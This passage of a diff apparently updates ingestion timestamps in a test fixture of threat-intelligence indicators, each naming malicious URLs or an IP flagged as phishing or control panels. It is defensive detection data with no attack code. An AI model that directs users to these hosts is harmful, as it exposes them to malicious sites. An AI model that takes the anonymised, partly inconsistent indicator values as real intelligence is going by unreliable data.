http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:15.653Z\"}", "category": "threat", "type": "indicator", 
@@ -17784,7 +17784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024680200Z", + "ingested": "2021-12-14T14:57:43.118317935Z", "original": "{\"created\":\"2020-02-06T02:11:17.072Z\",\"description\":\"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.072Z\",\"name\":\"mal_url: http://l5056942.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l5056942.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.072Z\"}", "category": "threat", "type": "indicator", @@ -17836,7 +17836,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024683800Z", + "ingested": "2021-12-14T14:57:43.118318321Z", "original": "{\"created\":\"2020-02-06T02:11:17.098Z\",\"description\":\"TS ID: 55290730797; iType: mal_url; State: active; Org: LLC Eximius; Source: CyberCrime\",\"id\":\"indicator--788aa60d-57c8-4a4c-9666-d6869ccd6c49\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:11:17.098Z\",\"name\":\"mal_url: http://h146438.s21.test-hf.su/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://h146438.s21.test-hf.su/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:17.098Z\"}", "category": "threat", "type": "indicator", 
@@ -17888,7 +17888,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024689Z", + "ingested": "2021-12-14T14:57:43.118318713Z", "original": "{\"created\":\"2020-02-06T02:11:27.123Z\",\"description\":\"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime\",\"id\":\"indicator--29909afa-ad21-493c-b420-870dbc8dd0da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:11:27.123Z\",\"name\":\"mal_url: http://tranpip.com/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tranpip.com/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:27.123Z\"}", "category": "threat", "type": "indicator", @@ -17939,7 +17939,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024696600Z", + "ingested": "2021-12-14T14:57:43.118319202Z", "original": "{\"created\":\"2020-02-06T02:11:37.189Z\",\"description\":\"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-06T02:11:37.189Z\",\"name\":\"mal_url: http://l1430a3c.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:11:37.189Z\"}", "category": "threat", "type": "indicator", 
@@ -17991,7 +17991,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024704100Z", + "ingested": "2021-12-14T14:57:43.118319699Z", "original": "{\"created\":\"2020-02-06T02:12:51.488Z\",\"description\":\"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:12:51.488Z\",\"name\":\"mal_url: http://f0391270.xsph.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:51.488Z\"}", "category": "threat", "type": "indicator", @@ -18042,7 +18042,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024709600Z", + "ingested": "2021-12-14T14:57:43.118320082Z", "original": "{\"created\":\"2020-02-06T02:12:52.562Z\",\"description\":\"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime\",\"id\":\"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:12:52.562Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:12:52.562Z\"}", "category": "threat", "type": "indicator", 
@@ -18094,7 +18094,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024716700Z", + "ingested": "2021-12-14T14:57:43.118320472Z", "original": "{\"created\":\"2020-02-06T02:13:24.038Z\",\"description\":\"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-06T02:13:24.038Z\",\"name\":\"mal_url: http://xmpzi.icu/blue/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xmpzi.icu/blue/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:24.038Z\"}", "category": "threat", "type": "indicator", @@ -18145,7 +18145,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024723900Z", + "ingested": "2021-12-14T14:57:43.118321019Z", "original": "{\"created\":\"2020-02-06T02:13:26.405Z\",\"description\":\"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-35\"],\"modified\":\"2020-02-06T02:13:26.405Z\",\"name\":\"mal_url: http://155.94.210.79/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://155.94.210.79/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:13:26.405Z\"}", "category": "threat", "type": "indicator", 
@@ -18196,7 +18196,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024731Z", + "ingested": "2021-12-14T14:57:43.118321458Z", "original": "{\"created\":\"2020-02-06T02:14:04.592Z\",\"description\":\"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-06T02:14:04.592Z\",\"name\":\"mal_url: http://lf9a7e2b.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:04.592Z\"}", "category": "threat", "type": "indicator", @@ -18247,7 +18247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024738300Z", + "ingested": "2021-12-14T14:57:43.118321884Z", "original": "{\"created\":\"2020-02-06T02:14:13.434Z\",\"description\":\"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-06T02:14:13.434Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.434Z\"}", "category": "threat", "type": "indicator", 
@@ -18292,7 +18292,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024745400Z", + "ingested": "2021-12-14T14:57:43.118322272Z", "original": "{\"created\":\"2020-02-06T02:14:13.474Z\",\"description\":\"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-16\"],\"modified\":\"2020-02-06T02:14:13.474Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.474Z\"}", "category": "threat", "type": "indicator", @@ -18343,7 +18343,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024752800Z", + "ingested": "2021-12-14T14:57:43.118322810Z", "original": "{\"created\":\"2020-02-06T02:14:13.506Z\",\"description\":\"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-06T02:14:13.506Z\",\"name\":\"mal_url: http://tikkies.eu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tikkies.eu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:13.506Z\"}", "category": "threat", "type": "indicator", 
@@ -18394,7 +18394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024759900Z", + "ingested": "2021-12-14T14:57:43.118323262Z", "original": "{\"created\":\"2020-02-06T02:14:14.285Z\",\"description\":\"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-06T02:14:14.285Z\",\"name\":\"mal_url: http://lb1a9935.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:14.285Z\"}", "category": "threat", "type": "indicator", @@ -18445,7 +18445,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024767Z", + "ingested": "2021-12-14T14:57:43.118323652Z", "original": "{\"created\":\"2020-02-06T02:14:30.841Z\",\"description\":\"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime\",\"id\":\"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-23\"],\"modified\":\"2020-02-06T02:14:30.841Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-06T02:14:30.841Z\"}", "category": "threat", "type": "indicator", 
@@ -18497,7 +18497,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024774200Z", + "ingested": "2021-12-14T14:57:43.118324169Z", "original": "{\"created\":\"2020-02-07T01:58:49.531Z\",\"description\":\"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.531Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.golob/ds.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.531Z\"}", "category": "threat", "type": "indicator", @@ -18549,7 +18549,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024781500Z", + "ingested": "2021-12-14T14:57:43.118324610Z", "original": "{\"created\":\"2020-02-07T01:58:49.782Z\",\"description\":\"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--44a6ba7f-2847-45c5-b4f3-452582094240\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T01:58:49.782Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:58:49.782Z\"}", "category": "threat", "type": "indicator", 
@@ -18601,7 +18601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024793300Z", + "ingested": "2021-12-14T14:57:43.118324994Z", "original": "{\"created\":\"2020-02-07T01:59:00.621Z\",\"description\":\"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime\",\"id\":\"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-07T01:59:00.621Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://189.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T01:59:00.621Z\"}", "category": "threat", "type": "indicator", @@ -18653,7 +18653,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024800800Z", + "ingested": "2021-12-14T14:57:43.118325717Z", "original": "{\"created\":\"2020-02-07T02:01:59.646Z\",\"description\":\"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--a8895396-ac11-49f3-bb81-6e854b871870\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:01:59.646Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.fotoci/ji.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:01:59.646Z\"}", "category": "threat", "type": "indicator", 
@@ -18705,7 +18705,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024806100Z", + "ingested": "2021-12-14T14:57:43.118326123Z", "original": "{\"created\":\"2020-02-07T02:02:24.529Z\",\"description\":\"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-07T02:02:24.529Z\",\"name\":\"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-07T02:02:24.529Z\"}", "category": "threat", "type": "indicator", @@ -18750,7 +18750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024830800Z", + "ingested": "2021-12-14T14:57:43.118326648Z", "original": "{\"created\":\"2020-02-08T14:02:11.92Z\",\"description\":\"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--0e0304f5-9735-4c6d-a860-95633369db34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-22\"],\"modified\":\"2020-02-08T14:02:11.92Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:11.92Z\"}", "category": "threat", "type": "indicator", 
@@ -18795,7 +18795,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024834800Z", + "ingested": "2021-12-14T14:57:43.118327145Z", "original": "{\"created\":\"2020-02-08T14:02:14.399Z\",\"description\":\"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-08T14:02:14.399Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:14.399Z\"}", "category": "threat", "type": "indicator", @@ -18846,7 +18846,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024839800Z", + "ingested": "2021-12-14T14:57:43.118327541Z", "original": "{\"created\":\"2020-02-08T14:02:17.271Z\",\"description\":\"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-08T14:02:17.271Z\",\"name\":\"mal_url: http://smineolo39wings.in/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://smineolo39wings.in/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:17.271Z\"}", "category": "threat", "type": "indicator", 
@@ -18897,7 +18897,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024847200Z", + "ingested": "2021-12-14T14:57:43.118327929Z", "original": "{\"created\":\"2020-02-08T14:02:23Z\",\"description\":\"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-08T14:02:23Z\",\"name\":\"mal_url: http://go.trust-oot.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://go.trust-oot.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23Z\"}", "category": "threat", "type": "indicator", @@ -18948,7 +18948,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024875400Z", + "ingested": "2021-12-14T14:57:43.118328427Z", "original": "{\"created\":\"2020-02-08T14:02:23.507Z\",\"description\":\"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime\",\"id\":\"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-02-08T14:02:23.507Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.507Z\"}", "category": "threat", "type": "indicator", 
@@ -18993,7 +18993,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024879900Z", + "ingested": "2021-12-14T14:57:43.118328939Z", "original": "{\"created\":\"2020-02-08T14:02:23.547Z\",\"description\":\"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-08T14:02:23.547Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:23.547Z\"}", "category": "threat", "type": "indicator", @@ -19044,7 +19044,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024883400Z", + "ingested": "2021-12-14T14:57:43.118329400Z", "original": "{\"created\":\"2020-02-08T14:02:33.679Z\",\"description\":\"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-08T14:02:33.679Z\",\"name\":\"mal_url: http://f0391897.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391897.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:33.679Z\"}", "category": "threat", "type": "indicator", 
@@ -19089,7 +19089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024888700Z", + "ingested": "2021-12-14T14:57:43.118329857Z", "original": "{\"created\":\"2020-02-08T14:02:53.996Z\",\"description\":\"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-02-08T14:02:53.996Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:53.996Z\"}", "category": "threat", "type": "indicator", @@ -19140,7 +19140,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024894900Z", + "ingested": "2021-12-14T14:57:43.118330334Z", "original": "{\"created\":\"2020-02-08T14:02:57.507Z\",\"description\":\"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--46c21251-c655-40c1-896d-2f4712091b7b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-08T14:02:57.507Z\",\"name\":\"mal_url: http://nikitakoteqka1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nikitakoteqka1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:57.507Z\"}", "category": "threat", "type": "indicator", 
@@ -19192,7 +19192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024919200Z", + "ingested": "2021-12-14T14:57:43.118330720Z", "original": "{\"created\":\"2020-02-08T14:02:59.236Z\",\"description\":\"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--7921e9e8-393c-4b0d-888f-bea034112f06\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-08T14:02:59.236Z\",\"name\":\"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.236Z\"}", "category": "threat", "type": "indicator", @@ -19243,7 +19243,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024949900Z", + "ingested": "2021-12-14T14:57:43.118331208Z", "original": "{\"created\":\"2020-02-08T14:02:59.246Z\",\"description\":\"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-08T14:02:59.246Z\",\"name\":\"mal_url: http://100stuff.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://100stuff.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.246Z\"}", "category": "threat", "type": "indicator", 
@@ -19288,7 +19288,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024954500Z", + "ingested": "2021-12-14T14:57:43.118331604Z", "original": "{\"created\":\"2020-02-08T14:02:59.31Z\",\"description\":\"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime\",\"id\":\"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-30\"],\"modified\":\"2020-02-08T14:02:59.31Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.31Z\"}", "category": "threat", "type": "indicator", @@ -19333,7 +19333,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024960200Z", + "ingested": "2021-12-14T14:57:43.118331999Z", "original": "{\"created\":\"2020-02-08T14:02:59.432Z\",\"description\":\"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--3cac5b3d-ffa6-4f5c-b190-7de9eb2e5a00\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-08T14:02:59.432Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:02:59.432Z\"}", "category": "threat", "type": "indicator", 
@@ -19385,7 +19385,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024968Z", + "ingested": "2021-12-14T14:57:43.118332388Z", "original": "{\"created\":\"2020-02-08T14:03:17.953Z\",\"description\":\"TS ID: 55298072311; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--86c43dc8-a27e-4f30-a29e-ba174f0a03ef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-08T14:03:17.953Z\",\"name\":\"mal_url: http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bacanacabana.com.br/wp-includes/css/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-08T14:03:17.953Z\"}", "category": "threat", "type": "indicator", @@ -19437,7 +19437,7 @@ } }, 